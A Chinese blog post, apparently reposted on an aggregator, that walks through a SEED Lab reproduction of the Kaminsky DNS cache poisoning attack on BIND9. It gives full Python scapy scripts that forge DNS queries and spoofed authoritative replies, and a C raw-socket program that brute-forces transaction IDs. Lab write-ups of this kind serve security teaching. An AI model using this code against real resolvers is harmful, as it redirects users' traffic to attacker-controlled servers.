2. 程式人生 > >DNS 快取中毒--Kaminsky 攻擊復現

DNS 快取中毒--Kaminsky 攻擊復現

阿新 發佈:2021-04-01

# 0x00 搭建實驗環境
使用3臺Ubuntu 16.04虛擬機器,可到下面的參考連結下載 攻擊的服務是BIND9,由於條件限制,這裡使用本地的一臺虛擬機器當作遠端DNS解析器,關閉了DNSSEC服務,其中三臺機器IP地址,如下圖所示: ![1](https://cdn.jsdelivr.net/gh/sumsunsuns/Blog-Photo@main/20210331125020.png) 具體的實驗環境搭建過程,可參考:[SEED Lab Description](https://seedsecuritylabs.org/Labs_16.04/PDF/DNS_Remote_new.pdf)
**配置User VM:** 在使用者機 的 `/etc/resolvconf/resolv.conf.d/head`檔案中,加入下面語句,將其Local DNS 設為 10.0.2.5。 ![image-20210331150924216](https://cdn.jsdelivr.net/gh/sumsunsuns/Blog-Photo@main/20210331150924.png)
更新 resolv.conf 檔案 ```bash sudo resolvconf -u ```
進行驗證:`dig www.example.com `,SERVER 為 要設定的Local DNS ip ,即表示設定成功。 ![](https://cdn.jsdelivr.net/gh/sumsunsuns/Blog-Photo@main/20210331152304.png)

**配置 Local DNS Server VM:** 編輯 /etc/bind/named.conf.options檔案,①關閉DNSSEC ②將快取 存放在dump.db檔案 ③設定查詢請求源埠為33333 ![image-20210331153128717](https://cdn.jsdelivr.net/gh/sumsunsuns/Blog-Photo@main/20210331153128.png)
編輯 /etc/bind/named.conf檔案,紅框中的 可以幫助我們在 attack32.com不存在的情況下,也能進行轉發。(在本地域名伺服器裡面設定,到查詢這個域名,不去詢問根域名,不用買域名伺服器,去詢問10.0.2.6,其他域名還是去根域名依次遞迴查詢找的。) ![image-20210331153447782](https://cdn.jsdelivr.net/gh/sumsunsuns/Blog-Photo@main/20210331153447.png)
全配置好之後,重啟bind9服務。 ```bash sudo service bind9 restart ```

**配置 attacker VM:** 編輯 /etc/bind/named.conf 檔案,設定兩個attack32.com,example.com兩個域。 ![image-20210331155044938](https://cdn.jsdelivr.net/gh/sumsunsuns/Blog-Photo@main/20210331155044.png)
編輯 /etc/bind/attack32.com.zone 檔案 ![image-20210331155343706](https://cdn.jsdelivr.net/gh/sumsunsuns/Blog-Photo@main/20210331155343.png)
編輯 /etc/bind/example.com.zone檔案 ![image-20210331155545866](https://cdn.jsdelivr.net/gh/sumsunsuns/Blog-Photo@main/20210331155545.png)
這裡的含義是,如果快取中毒,會把攻擊者的機器當作權威域名伺服器,向其 發出詢問,而攻擊者機器下的example.com.zone 檔案時偽造的,欺騙的。
全配置好之後,重啟bind9服務 ```bash sudo service bind9 restart ```

# 0x01攻擊概述
### 攻擊條件 ①攻擊者無法進行鏈路上的竊聽,但具有IP欺騙能力,攻擊者擁有一臺attack32.com域名伺服器。 ②伺服器沒有開啟DNSSEC功能。 ③伺服器沒有進行源埠隨機化,且已知發出查詢的源埠為33333。
### 攻擊模型 ![2](https://cdn.jsdelivr.net/gh/sumsunsuns/Blog-Photo@main/20210331145336.png)
①攻擊者先向DNS 解析器傳送一個xxxxx.example.com 的DNS查詢報文,觸發解析器去向根域名伺服器,頂級域名伺服器,權威域名伺服器遞迴解析。 ②遞迴解析器向權威域名伺服器發出查詢請求。 ③攻擊者傳送大量的偽造的權威域名伺服器響應資料包,其中使用NS記錄,將example.com整個域的查詢 轉向attack32.com,攻擊者的域名,實現快取中毒。一旦TXID命中,即可造成快取中毒。 ④真正的權威域名伺服器進行響應。

# 0x02 實驗程式碼 **思路:**使用C程式碼偽造DNS資料包 程式碼執行速度較快,完全可以滿足攻擊要求,但構造過程較為複雜,使用python scapy庫的方式,構造資料包簡單,但執行速度較慢,使Local DNS 快取中毒難度較大。 綜合以上,我們打算 結合二者,先用python scapy 庫構造資料包,儲存為二進位制檔案,然後再用C語言去載入構造的資料包,在相應的偏移位置做出修改。( 可以使用bless工具去檢視偏移量 )。
因為需要去迴圈進行查詢,爆破相應transaction ID,所以我們要修改的在觸發查詢的請求包中主要是請求的域名,在響應包裡面需要修改域名,transaction ID。

**偽造請求包觸發DNS解析器遞迴查詢** ```python from scapy.all import * target_name="xxxxx.example.com" ip = IP(dst='10.0.2.5',src='10.0.2.6') #dst為Local DNS IP,src是攻擊者IP。 udp = UDP(dport=53,sport=1234,chksum=0) qds = DNSQR(qname=target_name) dns = DNS(id=0xaaaa,qr=0,qdcount=1,ancount=0,nscount=0,arcount=0,qd=qds) Querypkt= ip/udp/dns with open('Query.bin','wb')as f: f.write(bytes(Querypkt)) ```
使用bless 檢視偏移量: ![image-20210331140222901](https://cdn.jsdelivr.net/gh/sumsunsuns/Blog-Photo@main/20210331140222.png)
發現xxxxx.example.com 在資料包中的偏移量為0x29,及轉化為十進位制為41。 後面會使用C code 進行修改。

**偽造響應包** ```python from scapy.all import * targetName="xxxxx.example.com" targetDomain="example.com" attackerNS ="ns.attack32.com" dstIP="10.0.2.5" srcIP='199.43.135.53' ip = IP(dst=dstIP,src=srcIP,chksum=0) udp = UDP(dport=33333,sport=53,chksum=0) Qdsec = DNSQR(qname=targetName) Ansec = DNSRR(rrname=targetName,type='A',rdata='1.2.3.4',ttl=259200) NSsec = DNSRR(rrname=targetDomain,type='NS',rdata=attackerNS,ttl=259200) dns = DNS(id=0xAAAA,aa=1,rd=1,qr=1,qdcount=1,ancount=1,nscount=1,arcount=0,qd=Qdsec,an=Ansec,ns=NSsec) Replypkt = ip/udp/dns with open('Reply.bin','wb') as f: f.write(bytes(Replypkt)) ```
使用bless檢視偏移量: ![image-20210331140636415](https://cdn.jsdelivr.net/gh/sumsunsuns/Blog-Photo@main/20210331140636.png)
因為之前我們生成的響應資料包transaction ID為0xAAAA,所以這裡我們可以直接查詢16進位制程式碼找到,偏移量為0x1c,十進位制為28。 同理,第一個xxxxx.example.com 在資料包中的偏移量為0x29,41,第二個xxxxx.example.com 在資料包中的偏移量為0x40,64。

**C攻擊程式碼:**
```c #include #include #include #include #include #include #include
#define MAX_FILE_SIZE 2000 /* IP Header */ struct ipheader { unsigned char iph_ihl:4, //IP header length iph_ver:4; //IP version unsigned char iph_tos; //Type of service unsigned short int iph_len; //IP Packet length (data + header) unsigned short int iph_ident; //Identification unsigned short int iph_flag:3, //Fragmentation flags iph_offset:13; //Flags offset unsigned char iph_ttl; //Time to Live unsigned char iph_protocol; //Protocol type unsigned short int iph_chksum; //IP datagram checksum struct in_addr iph_sourceip; //Source IP address struct in_addr iph_destip; //Destination IP address }; void send_raw_packet(char * buffer, int pkt_size); int main() { long i = 0; srand(time(NULL)); // Load the DNS request packet from file FILE * f_req = fopen("Query.bin", "rb"); if (!f_req) { perror("Can't open 'Query.bin'"); exit(1); } unsigned char ip_req[MAX_FILE_SIZE]; int n_req = fread(ip_req, 1, MAX_FILE_SIZE, f_req); // Load the first DNS response packet from file FILE * f_resp = fopen("Reply.bin", "rb"); if (!f_resp) { perror("Can't open 'Reply.bin'"); exit(1); } unsigned char ip_resp[MAX_FILE_SIZE]; int n_resp = fread(ip_resp, 1, MAX_FILE_SIZE, f_resp); char a[26]="abcdefghijklmnopqrstuvwxyz"; unsigned short transaction_id = 0; while (1) { // Generate a random name with length 5 char name[5]; for (int k=0; k<5; k++) name[k] = a[rand() % 26]; printf("attempt #%ld. request is [%s.example.com], transaction ID is: [%hu]\n", ++i, name, transaction_id); //################################################################## /* Step 1. Send a DNS request to the targeted local DNS server This will trigger it to send out DNS queries */ memcpy(ip_req+41,name,5); //偏移量為41 send_raw_packet(ip_req, n_req); // Step 2. Send spoofed responses to the targeted local DNS server. memcpy(ip_resp+41,name,5); //xxxxx 兩個域名偏移量為 41 和64 memcpy(ip_resp+64,name,5); for(int i=0;i<100;i++) { transaction_id++; memcpy(ip_resp+28,&transaction_id,2); send_raw_packet(ip_resp,n_resp); } //################################################################## } return 0; } /* Send the raw packet out * buffer: to contain the entire IP packet, with everything filled out. * pkt_size: the size of the buffer. * */ void send_raw_packet(char * buffer, int pkt_size) { struct sockaddr_in dest_info; int enable = 1; // Step 1: Create a raw network socket. int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); // Step 2: Set socket option. setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &enable, sizeof(enable)); // Step 3: Provide needed information about destination. struct ipheader *ip = (struct ipheader *) buffer; //IP包 dest_info.sin_family = AF_INET; dest_info.sin_addr = ip->
iph_destip; // Step 4: Send the packet out. sendto(sock, buffer, pkt_size, 0, (struct sockaddr *)&dest_info, sizeof(dest_info)); close(sock); } ```

# 0x03 詳細過程 `dig www.example.com` 進行解析,可得到正常情況下的地址為93.184.216.34 ![image-20210331121835365](https://cdn.jsdelivr.net/gh/sumsunsuns/Blog-Photo@main/20210331121835.png)
未發動攻擊前,使用check.sh檢視快取,快取中並沒有相應記錄。 ![image-20210331120044725](https://cdn.jsdelivr.net/gh/sumsunsuns/Blog-Photo@main/20210331120051.png)
注意使用raw socket 要使用 sudo進行執行程式。 ![image-20210331131904789](https://cdn.jsdelivr.net/gh/sumsunsuns/Blog-Photo@main/20210331131904.png)
程式執行過程: ![image-20210331132024205](https://cdn.jsdelivr.net/gh/sumsunsuns/Blog-Photo@main/20210331132024.png)

# 0x04 結果驗證
在Local DNS sever 端 寫了一個bash指令碼check.sh,進行驗證,也可直接在terminal終端使用中間兩條命令。 ```bash #!/bin/bash echo 'dump the cache' sudo rndc dumpdb -cache cat /var/cache/bind/dump.db | grep attack echo 'if there is no result,the attack has not succeed yet' ``` **sudo rndc dumpdb -cache** 將bind的快取轉存到`/var/cache/bind/dump.db`中 **cat /var/cache/bind/dump.db | grep attack** 檢視dump.db檔案, grep attack 查詢帶有attack的。
大約十秒左右,即可在Sever VM,通過check.sh指令碼檢視到結果。 ![image-20210331132235925](https://cdn.jsdelivr.net/gh/sumsunsuns/Blog-Photo@main/20210331132235.png)
然後在User VM,進行驗證。 ![image-20210331132453766](https://cdn.jsdelivr.net/gh/sumsunsuns/Blog-Photo@main/20210331132453.png)
**攻擊成功!**


# 0x05 參考資料
[SEED Lab](https://seedsecuritylabs.org/Labs_16.04/Networking/DNS_Remote/) [SEED Lab Description](https://seedsecuritylabs.org/Labs_16.04/PDF/DNS_Remote_n

相關推薦

DNS 快取中毒--Kaminsky 攻擊復現

# 0x00 搭建實驗環境 使用3臺Ubuntu 16.04虛擬機器,可到下面的參考連結下載 攻擊的服務是BIND9,由於條件限制,這裡使用本地的一臺虛擬機器當作遠端DNS解析器,關閉了DNSSEC服務,其中三臺機器IP地址,如下圖所示: ![1](https://cdn.jsdelivr.ne

SAD DNS--新型DNS快取中毒攻擊

# 一、DNS基礎知識: ## 1.DNS簡介: DNS 域名服務,用於建立 域名與 ip地址的 一對一 對映。DNS 將域名轉換為 IP地址,以便瀏覽器能夠載入 Internet 資源。 類似於一個翻譯系統,將xxx.com 翻譯為 ip地址(如:192.0.2.254),這種轉換髮生在幕後,

DNS緩存欺騙攻擊

無線 控制 獲得 域名 d-link 即使 域名服務 python 是否 1、受影響的無線網絡設備   一些D-link、TP-Link、Belkin、Linksys及IPTime等品牌無線路由器存在安全隱患。 2、漏洞描述   攻擊者向DNS服務器註入非法網絡域名地址,如

nginx的DNS快取

原文:https://blog.csdn.net/amdkings1/article/details/79092937  nginx 配置中有1個upstream配置是指向一個域名Y的,而這個域名Y解析對應IP其實是會動態變化的。 最近生產環境發現一個奇怪現象,上面的配置正常運行了

如何在Chrome瀏覽器下清除DNS快取

如何在Chrome瀏覽器下清除DNS快取 本文翻譯自:How to Clear/Flush DNS Cache in Google Chrome? 很多時候,當我購買新的域名,並更改域名伺服器並將其託管在我的伺服器後,解析DNS並且生效需要較長的時間,我手動在Windows作業系統清

Linux清空DNS快取,重新整理DNS的方法(ubuntu,debian)

前言 在Linux系統裡查詢DNS使用如下命令 dig baidu.com @114.114.114.114 或者使用系統預設的DNS伺服器查詢 nslookup baidu.com 下文中的方法不一定全管用,但你總能找到管用的一個 1.network-manag

什麼是域名的TTL值? ——一條域名解析記錄在DNS快取伺服器中的存留時間

什麼是域名的TTL值?  轉自:http://hizip.net/index.php/archives/20/ TTL(Time-To-Live),就是一條域名解析記錄在DNS伺服器中的存留時間。當各地的DNS伺服器接受到解析請求時,就會向域名指定的NS伺服器(權威域名伺服器)發出解析

linux中如何設定dns快取記憶體伺服器

1.首先我們來複習一下什麼是dns DNS(Domain Name System,域名系統),全球資訊網上作為域名和IP地址相互對映的一個分散式資料庫,能夠使使用者更方便的訪問網際網路,而不用去記住能夠被機器直接讀取的IP數串。通過域名,最終得到該域名對應的IP地址的過程叫做域名解析(或主機名解

DNS快取記憶體伺服器配置

概述 當我們在訪問網頁時,需要通過DNS伺服器去解析網站地址,解析時間很短,但是當DNS訪問量非常大時候,會導致訪問網頁響應時間變長,影響服務質量。 DNS快取記憶體 當一臺主機第一次訪問網頁時,此時該主機的DNS伺服器會從其他DNS伺服器獲取資料,(注:搭建的DNS快取記憶體伺服器

Linux下重新整理DNS快取(Ubuntu/CentOS)

現在很多Linux發行版都沒有內建DNS本地快取,Linux不像Windows那樣可以使用ipconfig /flushdns來重新整理,在Linux下無需重新整理,因為本身沒有快取; 當然,如果非要快取重新整理,可以安裝nscd,然後重新整理這個守護程序。 Ubuntu: apt-get instal

11.17 域名解析DNS---------快取記憶體DNS,權威DNS的正反向解析,輪詢:域名轉換,,郵箱解析,內部解析和外部解析

1.概念的介紹 1)DNS DNS(Domain Name System,域名系統),全球資訊網上作為域名和IP地址相互對映的一個分散式資料庫,能夠使使用者更方便的訪問網際網路,而不用去記住能夠被機器直接讀取的IP數串。 2)快取記憶體DNS服務 快取記憶體DNS服務的作用:正常上網

如何重新整理DNS快取

首先進入命令提示符下(開始——執行——cmd): 先執行:ipconfig /displaydns 這個命令,檢視一下本機已經快取了那些的dns資訊的,然後輸入下面的命令 ipconfig /flushdns 這時本機的dns快取資訊已經清空了,設定DNS 我們可以再

DNS快取伺服器投毒

只要黑客想這麼做,那我可以保證,您訪問的Google,絕不是Google,淘寶也不是淘寶,而是一個偽裝的網站,2008年,給ISP的DNS快取伺服器投毒是安全界最熱門的話題,並且,這個問題仍然無法解決…… 通過本文,會看到一些奇妙的事情: 1、您發現在自家電腦的瀏覽器裡輸入

macOS Sierra清除DNS快取

清除macOS的DNS快取在Sierra版本中需要執行如下命令:sudo killall -HUP mDNSResponder;say DNS cache has been flushed執行完命令後,macOS的DNS快取就被清理了。

如何檢視和清除Windows本地的DNS快取內容

A. When a Windows XP or Windows 2000 machine queries a DNS server, the response is either positive (a match was found) or negative (no

linux開啟nscd服務快取加速-DNS快取

在我使用的阿里雲主機上有觀察到開啟了一個服務nscd ,後來谷哥了下該服務的作用。瞭解到nscd會快取三種服務passwd group hosts,所以它會記錄三個庫,分別對應源/etc/passwd, /etc/hosts 和 /etc/resolv.conf每個庫儲存兩份快取,一份是找到記錄

為什麼修改hosts不立即生效?--瀏覽器DNS快取機制分析

經常做Web開發的工程師,都會遇到需要將某個域名繫結到特定IP上,進行測試的情況。大家一般都會用修改hosts檔案的方式來解決,但是經常也會遇到修改hosts不生效的情況,而且有時生效,有時不生效的情況也有發生,這到底是為什麼呢? ###起:DNS快取機制 關於DNS快取的機制,有一篇非

一次DNS快取引發的慘案

時間2015年的某個週六凌晨5點,公司官方的QQ群有使用者反饋官網打不開了,但有的使用者反饋可以開啟,客服爬起來自己用電腦試了一下沒有問題,就給客戶反饋說,可能是自己網路的問題,請過會在試試。早點8點,越來越多的使用者反饋官網無法開啟,並且有部分使用者開發反饋app也打不開了,客服打電話叫起了還在夢

配置DNS快取記憶體

使真機虛擬機器都能上網,配置虛擬機器yum源 真機:防火牆開啟路由功能(不可關閉),開啟核心路由功能,設定DNS的nameserver指向虛擬機器ip地址 虛擬機器:安裝快取記憶體服務,修改配置檔案,設定DNS可上網,關閉火牆   配置DNS快取記憶體操作步驟 yum

Windows如何重新整理本地DNS快取

有時候修改了域名解析,本地測試ping不生效,除了域名ttl的原因之外,還可能是本地的dns快取了原來的解析地址。 只要重新整理下本地DNS快取即可 開啟cmd執行ipconfig /flushdns即可 贊 1